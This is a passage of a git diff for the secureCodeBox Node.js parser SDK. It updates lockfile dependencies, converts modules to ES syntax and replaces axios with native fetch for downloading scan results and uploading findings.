"sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg==" - }, - "psl": { - "version": "1.8.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.8.0.tgz", - "integrity": "sha512-RIdOzyoavK+hA18OGGWDqUTsCLhtA7IcZ/6NCs4fFJaHBDab+pDDmDIByWFRQJq2Cd7r1OoQxBGKOaztq+hjIQ==" - }, - "punycode": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.1.1.tgz", - "integrity": "sha512-XRsRjdf+j5ml+y/6GKHPZbrF/8p2Yga0JPtdqTIY2Xe5ohJPD9saDJJLPvp9+NSBprVvevdXZybnj2cv8OEd0A==" - }, - "qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==" - }, - "request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", + "pump": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.2.tgz", + "integrity": "sha512-tUPXtzlGM8FE3P0ZL6DVs/3P58k9nk8/jZeQCurTJylQA8qFYzHFfhBJkuqyE0FifOsQ0uKWekiZ5g8wtr28cw==", "requires": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "dependencies": { - "form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - } - }, - "uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" - } + "end-of-stream": "^1.1.0", + "once": "^1.3.1" } }, "require-from-string": { @@ -1868,260 +997,113 @@ "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.0.tgz", "integrity": "sha512-FA6W9lDNeX8WbMY31io1xWg+TpZCbeDKsBo0ocwACZiWnh9TUAyk9CCuBQuOPmYnwwdEQZmraQ2ZK7yJsxErBg==" }, - "rimraf": { - "version": "5.0.10", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-5.0.10.tgz", - "integrity": "sha512-l0OE8wL34P4nJH/H2ffoaniAokM2qSmrtXHmlpvYr5AVVX8msAyW0l8NVJFDxlSK4u3Uh/f41cQheDVdnYijwQ==", - "requires": { - "glob": "^10.3.7" - } - }, - "safe-buffer": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", - "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==" - }, - "safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" + "smart-buffer": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/smart-buffer/-/smart-buffer-4.2.0.tgz", + "integrity": "sha512-94hK0Hh8rPqQl2xXc3HsaBoOXKV20MToPkcXvwbISWLEs+64sBq5kFgn2kJDHb1Pry9yrP0dxrCI9RRci7RXKg==" }, - "shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", + "socks": { + "version": "2.8.5", + "resolved": "https://registry.npmjs.org/socks/-/socks-2.8.5.tgz", + "integrity": "sha512-iF+tNDQla22geJdTyJB1wM/qrX9DMRwWrciEPwWLPRWAUEM8sQiyxgckLxWT1f7+9VabJS0jTGGr4QgBuvi6Ww==", "requires": { - "shebang-regex": "^3.0.0" + "ip-address": "^9.0.5", + "smart-buffer": "^4.2.0" } }, - "shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==" - }, - "signal-exit": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", - "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==" - }, - "sshpk": { - "version": "1.16.1", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.16.1.tgz", - "integrity": "sha512-HXXqVUq7+pcKeLqqZj6mHFUMvXtOJt1uoUx09pFW6011inTMxqI8BA8PM95myrIyyKwdnzjdFjLiE6KBPVtJIg==", + "socks-proxy-agent": { + "version": "8.0.5", + "resolved": "https://registry.npmjs.org/socks-proxy-agent/-/socks-proxy-agent-8.0.5.tgz", + "integrity": "sha512-HehCEsotFqbPW9sJ8WVYB6UbmIMv7kUUORIF2Nncq4VQvBfNBLibW9YZR5dlYCSUhwcD628pRllm7n+E+YTzJw==", "requires": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" + "agent-base": "^7.1.2", + "debug": "^4.3.4", + "socks": "^2.8.3" } }, + "sprintf-js": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.3.tgz", + "integrity": "sha512-Oo+0REFV59/rz3gfJNKQiBlwfHaSESl1pcGyABQsnnIfWOFt6JNj5gCog2U6MLZ//IGYD+nA8nI+mTShREReaA==" + }, "stream-buffers": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==" }, - "string-width": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-5.1.2.tgz", - "integrity": "sha512-HnLOCR3vjcY8beoNLtcjZ5/nxn2afmME6lhrDrebokqMap+XbeW8n9TXpPDOqdGK5qcI3oT0GKTW6wC7EMiVqA==", - "requires": { - "eastasianwidth": "^0.2.0", - "emoji-regex": "^9.2.2", - "strip-ansi": "^7.0.1" - } - }, - "string-width-cjs": { - "version": "npm:string-width@4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "dependencies": { - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==" - }, - "emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" - }, - "strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "requires": { - "ansi-regex": "^5.0.1" - } - } - } - }, - "strip-ansi": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-7.1.0.tgz", - "integrity": "sha512-iq6eVVI64nQQTRYq2KtEg2d2uU7LElhTJwsH4YzIHZshxlgZms/wIc4VoDQTlG/IvVIrBKG06CrZnp0qv7hkcQ==", + "streamx": { + "version": "2.22.1", + "resolved": "https://registry.npmjs.org/streamx/-/streamx-2.22.1.tgz", + "integrity": "sha512-znKXEBxfatz2GBNK02kRnCXjV+AA4kjZIUxeWSr3UGirZMJfTE9uiwKHobnbgxWyL/JWro8tTq+vOqAK1/qbSA==", "requires": { - "ansi-regex": "^6.0.1" + "bare-events": "^2.2.0", + "fast-fifo": "^1.3.2", + "text-decoder": "^1.1.0" } }, - "strip-ansi-cjs": { - "version": "npm:strip-ansi@6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", + "tar-fs": { + "version": "3.0.9", + "resolved": "https://registry.npmjs.org/tar-fs/-/tar-fs-3.0.9.tgz", + "integrity": "sha512-XF4w9Xp+ZQgifKakjZYmFdkLoSWd34VGKcsTCwlNWM7QG3ZbaxnTsaBwnjFZqHRf/rROxaR8rXnbtwdvaDI+lA==", "requires": { - "ansi-regex": "^5.0.1" - }, - "dependencies": { - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==" - } + "bare-fs": "^4.0.1", + "bare-path": "^3.0.0", + "pump": "^3.0.0", + "tar-stream": "^3.1.5" } }, - "tar": { - "version": "7.4.3", - "resolved": "https://registry.npmjs.org/tar/-/tar-7.4.3.tgz", - "integrity": "sha512-5S7Va8hKfV7W5U6g3aYxXmlPoZVAwUMy9AOKyF2fVuZa2UD3qZjg578OrLRt8PcNN1PleVaL/5/yYATNL0ICUw==", - "requires": { - "@isaacs/fs-minipass": "^4.0.0", - "chownr": "^3.0.0", - "minipass": "^7.1.2", - "minizlib": "^3.0.1", - "mkdirp": "^3.0.1", - "yallist": "^5.0.0" - } - }, - "tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", + "tar-stream": { + "version": "3.1.7", + "resolved": "https://registry.npmjs.org/tar-stream/-/tar-stream-3.1.7.tgz", + "integrity": "sha512-qJj60CXt7IU1Ffyc3NJMjh6EkuCFej46zUqJ4J7pqYlThyd9bO0XBTmcOIhSzZJVWfsLks0+nle/j538YAW9RQ==", "requires": { - "psl": "^1.1.28", - "punycode": "^2.1.1" + "b4a": "^1.6.4", + "fast-fifo": "^1.2.0", + "streamx": "^2.15.0" } }, - "tslib": { - "version": "2.4.1", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.4.1.tgz", - "integrity": "sha512-tGyy4dAjRIEwI7BzsB0lynWgOpfqjUdq91XXAlIWD2OwKBH7oCl/GZG/HT4BOHrTlPMOASlMQ7veyTqpmRcrNA==" - }, - "tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha1-J6XeoGs2sEoKmWZ3SykIaPD8QP0=", + "text-decoder": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/text-decoder/-/text-decoder-1.2.3.tgz", + "integrity": "sha512-3/o9z3X0X0fTupwsYvR03pJ/DjWuqqrfwBgTQzdWDiQSm9KitAyz/9WqsT2JQW7KV2m+bC2ol/zqpW37NHxLaA==", "requires": { - "safe-buffer": "^5.0.1" + "b4a": "^1.6.4" } }, - "tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha1-WuaBd/GS1EViadEIr6k/+HQ/T2Q=" - }, - "uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "requires": { - "punycode": "^2.1.0" - } + "tr46": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", + "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==" }, - "verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha1-OhBcoXBTr1XW4nDB+CiGguGNpAA=", - "requires": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" - } + "undici-types": { + "version": "6.20.0", + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.20.0.tgz", + "integrity": "sha512-Ny6QZ2Nju20vw1SRHe3d9jVu6gJ+4e3+MMpqu7pqE5HT6WsTSlce++GQmK5UXS8mzV8DSYHrQH+Xrf2jVcuKNg==" }, - "which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "requires": { - "isexe": "^2.0.0" - } + "webidl-conversions": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", + "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==" }, - "wrap-ansi": { - "version": "8.1.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-8.1.0.tgz", - "integrity": "sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ==", + "whatwg-url": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", + "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", "requires": { - "ansi-styles": "^6.1.0", - "string-width": "^5.0.1", - "strip-ansi": "^7.0.1" + "tr46": "~0.0.3", + "webidl-conversions": "^3.0.0" } }, - "wrap-ansi-cjs": { - "version": "npm:wrap-ansi@7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "requires": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "dependencies": { - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==" - }, - "ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "requires": { - "color-convert": "^2.0.1" - } - }, - "emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" - }, - "string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - } - }, - "strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "requires": { - "ansi-regex": "^5.0.1" - } - } - } + "wrappy": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", + "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" }, "ws": { - "version": "8.18.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.0.tgz", - "integrity": "sha512-8VbfWfHLbbwu3+N6OKsOMpBdT4kXPDDB9cJk2bJ6mh9ucxdlnNvH1e+roYkKmN9Nxw2yjz7VzeO9oOz2zJ04Pw==", + "version": "8.18.2", + "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.2.tgz", + "integrity": "sha512-DMricUmwGZUVr++AEAe2uiVM7UoO9MAVZMDu05UQOaUII0lp+zOzLLU4Xqh/JvTqklB1T4uELaaPBKyjE1r4fQ==", "requires": {} - }, - "yallist": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-5.0.0.tgz", - "integrity": "sha512-YgvUTfwqyc7UXVMrB+SImsVYSmTS8X/tSrtdNZMImM+n7+QTriRXyXim0mBrTXNeqzVF0KWGgHPeiyViFFrNDw==" } } } diff --git a/parser-sdk/nodejs/package.json b/parser-sdk/nodejs/package.json index c51637abb9..5378db798f 100644 --- a/parser-sdk/nodejs/package.json +++ b/parser-sdk/nodejs/package.json @@ -1,18 +1,17 @@ { "name": "@securecodebox/parser-sdk-nodejs", "version": "1.0.0", + "type": "module", "description": "Handles external communication required for all secureCodeBox parsers", "main": "parser-wrapper.js", "keywords": [], "author": "iteratec GmbH", "license": "Apache-2.0", "dependencies": { - "@kubernetes/client-node": "^0.22.3", + "@kubernetes/client-node": "^1.3.0", "ajv": "^8.17.1", "ajv-draft-04": "^1.0.0", "ajv-formats": "^3.0.1", - "axios": "^1.7.9", - "jsonpointer": "^5.0.1", - "ws": "^8.13.0" + "jsonpointer": "^5.0.1" } -} +} \ No newline at end of file diff --git a/parser-sdk/nodejs/parser-utils.js b/parser-sdk/nodejs/parser-utils.js index 655b436fe3..5f072896b9 100644 --- a/parser-sdk/nodejs/parser-utils.js +++ b/parser-sdk/nodejs/parser-utils.js @@ -2,26 +2,31 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("node:fs/promises"); -const { randomUUID } = require("node:crypto"); -const Ajv = require("ajv-draft-04"); -const addFormats = require("ajv-formats"); -const jsonpointer = require("jsonpointer"); +import { readFile } from "node:fs/promises"; +import { randomUUID } from "node:crypto"; + +import addFormats from "ajv-formats"; +import { get } from "jsonpointer"; +import Ajv from "ajv-draft-04"; const ajv = new Ajv(); addFormats(ajv); -function addIdsAndDates(findings) { - return findings.map((finding) => { - return { - ...finding, - id: randomUUID(), - parsed_at: new Date().toISOString(), - }; - }); +export async function validate(findings) { + const jsonSchemaString = await readFile( + import.meta.dirname + "/findings-schema.json", + "utf8", + ); + const jsonSchema = JSON.parse(jsonSchemaString); + const validator = ajv.compile(jsonSchema); + const valid = validator(findings); + if (!valid) { + const errorMessage = generateErrorMessage(validator.errors, findings); + throw new Error(errorMessage); + } } -function addScanMetadata(findings, scan) { +export function addScanMetadata(findings, scan) { const scanMetadata = { created_at: scan.metadata.creationTimestamp, name: scan.metadata.name, @@ -35,21 +40,18 @@ function addScanMetadata(findings, scan) { })); } -async function validateAgainstJsonSchema(findings) { - const jsonSchemaString = await readFile( - __dirname + "/findings-schema.json", - "utf8" - ); - const jsonSchema = JSON.parse(jsonSchemaString); - const validator = ajv.compile(jsonSchema); - const valid = validator(findings); - if (!valid) { - const errorMessage = generateErrorMessage(validator.errors, findings); - throw new Error(errorMessage); - } +export function addIdsAndDates(findings) { + return findings.map((finding) => { + return { + ...finding, + id: randomUUID(), + parsed_at: new Date().toISOString(), + }; + }); } -async function addSampleIdsAndDatesAndValidate(findings) { +// used for tests to validate if the parser sets all required fields correctly. Adds sample IDs and Dates to the findings which would normally be set by the parser-sdk. +export async function validateParser(findings) { const sampleScan = { metadata: { creationTimestamp: new Date().toISOString(), @@ -59,23 +61,21 @@ async function addSampleIdsAndDatesAndValidate(findings) { spec: { scanType: "sample-scan-type", }, - } + }; // add sample IDs and Dates only if the findings Array is not empty - const extendedData = addScanMetadata(addIdsAndDates(findings),sampleScan); - return validateAgainstJsonSchema(extendedData); + const extendedData = addScanMetadata(addIdsAndDates(findings), sampleScan); + return validate(extendedData); } function generateErrorMessage(errors, findings) { - errors = errors.map((error) => { - return { - ...error, - invalidValue: jsonpointer.get(findings, error.instancePath), - }; - }); - return JSON.stringify(errors, null, 2); + return JSON.stringify( + errors.map((error) => { + return { + ...error, + invalidValue: get(findings, error.instancePath), + }; + }), + null, + 2, + ); } - -module.exports.addIdsAndDates = addIdsAndDates; -module.exports.addScanMetadata = addScanMetadata; -module.exports.validate = validateAgainstJsonSchema; -module.exports.validateParser = addSampleIdsAndDatesAndValidate; diff --git a/parser-sdk/nodejs/parser-wrapper.js b/parser-sdk/nodejs/parser-wrapper.js index 7f645dc30b..4534185bc7 100644 --- a/parser-sdk/nodejs/parser-wrapper.js +++ b/parser-sdk/nodejs/parser-wrapper.js @@ -2,52 +2,63 @@ // // SPDX-License-Identifier: Apache-2.0 -const axios = require("axios"); -const { parse } = require("./parser/parser"); -const { validate, addIdsAndDates, addScanMetadata } = require("./parser-utils"); -const k8s = require("@kubernetes/client-node"); - -const kc = new k8s.KubeConfig(); +import { Buffer } from "node:buffer"; +import { + KubeConfig, + CustomObjectsApi, + setHeaderOptions, + PatchStrategy, +} from "@kubernetes/client-node"; + +import { parse } from "./parser/parser.js"; +import { validate, addIdsAndDates, addScanMetadata } from "./parser-utils.js"; + +const kc = new KubeConfig(); kc.loadFromCluster(); -const k8sApi = kc.makeApiClient(k8s.CustomObjectsApi); +const k8sApi = kc.makeApiClient(CustomObjectsApi); + const scanName = process.env["SCAN_NAME"]; const namespace = process.env["NAMESPACE"]; function severityCount(findings, severity) { return findings.filter( ({ severity: findingSeverity }) => - findingSeverity.toUpperCase() === severity + findingSeverity.toUpperCase() === severity, ).length; } async function uploadResultToFileStorageService( resultUploadUrl, - findingsWithIdsAndDates + findingsWithIdsAndDates, ) { - return axios - .put(resultUploadUrl, findingsWithIdsAndDates, { + try { + const res = await fetch(resultUploadUrl, { + method: "PUT", headers: { "content-type": "" }, - maxBodyLength: Infinity, - }) - .catch(function (error) { - if (error.response) { - // The request was made and the server responded with a status code - // that falls out of the range of 2xx - console.error( - `Finding Upload Failed with Response Code: ${error.response.status}` - ); - console.error(`Error Response Body: ${error.response.data}`); - } else if (error.request) { - console.error( - "No response received from FileStorage when uploading finding" - ); - console.error(error); - } else { - // Something happened in setting up the request that triggered an Error - console.log("Error", error.message); - } - process.exit(1); + body: JSON.stringify(findingsWithIdsAndDates), }); + if (!res.ok) { + const text = await res.text(); + console.error(`Finding Upload Failed with Response Code: ${res.status}`); + console.error(`Error Response Body: ${text}`); + process.exit(1); + } + } catch (error) { + if (error.response) { + console.error( + `Finding Upload Failed with Response Code: ${error.response.status}`, + ); + console.error(`Error Response Body: ${error.response.data}`); + } else if (error.request) { + console.error( + "No response received from FileStorage when uploading finding", + ); + console.error(error); + } else { + console.log("Error", error.message); + } + process.exit(1); + } } async function updateScanStatus(findings) { @@ -62,29 +73,28 @@ async function updateScanStatus(findings) { } await k8sApi.patchNamespacedCustomObjectStatus( - "execution.securecodebox.io", - "v1", - namespace, - "scans", - scanName, { - status: { - findings: { - count: findings.length, - severities: { - informational: severityCount(findings, "INFORMATIONAL"), - low: severityCount(findings, "LOW"), - medium: severityCount(findings, "MEDIUM"), - high: severityCount(findings, "HIGH"), + group: "execution.securecodebox.io", + version: "v1", + namespace, + plural: "scans", + name: scanName, + body: { + status: { + findings: { + count: findings.length, + severities: { + informational: severityCount(findings, "INFORMATIONAL"), + low: severityCount(findings, "LOW"), + medium: severityCount(findings, "MEDIUM"), + high: severityCount(findings, "HIGH"), + }, + categories: Object.fromEntries(findingCategories.entries()), }, - categories: Object.fromEntries(findingCategories.entries()), }, }, }, - undefined, - undefined, - undefined, - { headers: { "content-type": "application/merge-patch+json" } } + setHeaderOptions("Content-Type", PatchStrategy.MergePatch), ); console.log("Updated status successfully"); } catch (err) { @@ -96,32 +106,29 @@ async function updateScanStatus(findings) { async function extractScan() { try { - const { body } = await k8sApi.getNamespacedCustomObject( - "execution.securecodebox.io", - "v1", + return await k8sApi.getNamespacedCustomObject({ + group: "execution.securecodebox.io", + version: "v1", + plural: "scans", + name: scanName, namespace, - "scans", - scanName - ); - return body; + }); } catch (err) { console.error("Failed to get Scan from the kubernetes api"); console.error(err); process.exit(1); } - } async function extractParseDefinition(scan) { try { - const { body } = await k8sApi.getNamespacedCustomObject( - "execution.securecodebox.io", - "v1", + return await k8sApi.getNamespacedCustomObject({ + group: "execution.securecodebox.io", + version: "v1", + plural: "parsedefinitions", + name: scan.status.rawResultType, namespace, - "parsedefinitions", - scan.status.rawResultType - ); - return body; + }); } catch (err) { console.error("Failed to get ParseDefinition from the kubernetes api"); console.error(err); @@ -129,6 +136,26 @@ async function extractParseDefinition(scan) { } } +async function fetchResultFile(resultFileUrl, contentType) { + try { + const response = await fetch(resultFileUrl, { method: "GET" }); + if (!response.ok) { + throw new Error( + `Failed to fetch result file: ${response.status} ${response.statusText}`, + ); + } + if (contentType === "Binary") { + return Buffer.from(await response.arrayBuffer()); + } else { + return await response.text(); + } + } catch (err) { + throw new Error( + `Failed to fetch result file from ${resultFileUrl}: ${err.message}`, + ); + } +} + async function main() { console.log("Starting Parser"); let scan = await extractScan(); @@ -137,18 +164,23 @@ async function main() { const resultUploadUrl = process.argv[3]; console.log("Fetching result file"); - let response; - if(parseDefinition.spec.contentType === "Binary"){ - response = await axios.get(resultFileUrl, {responseType: 'arraybuffer'}); - } else { - response = await axios.get(resultFileUrl); + let data = null; + try { + data = await fetchResultFile( + resultFileUrl, + parseDefinition.spec.contentType, + ); + } catch (error) { + console.error("Failed to fetch scan result file for parser:"); + console.error(error); + process.exit(1); } console.log("Fetched result file"); let findings = []; try { - findings = await parse(response.data, scan); + findings = await parse(data, scan); } catch (error) { console.error("Parser failed with error:"); console.error(error); @@ -162,11 +194,15 @@ async function main() { console.log("Adding scan metadata to the findings"); const findingsWithMetadata = addScanMetadata(findingsWithIdsAndDates, scan); - const crash_on_failed_validation = process.env["CRASH_ON_FAILED_VALIDATION"] === "true" - console.log("Validating Findings. Environment variable CRASH_ON_FAILED_VALIDATION is set to 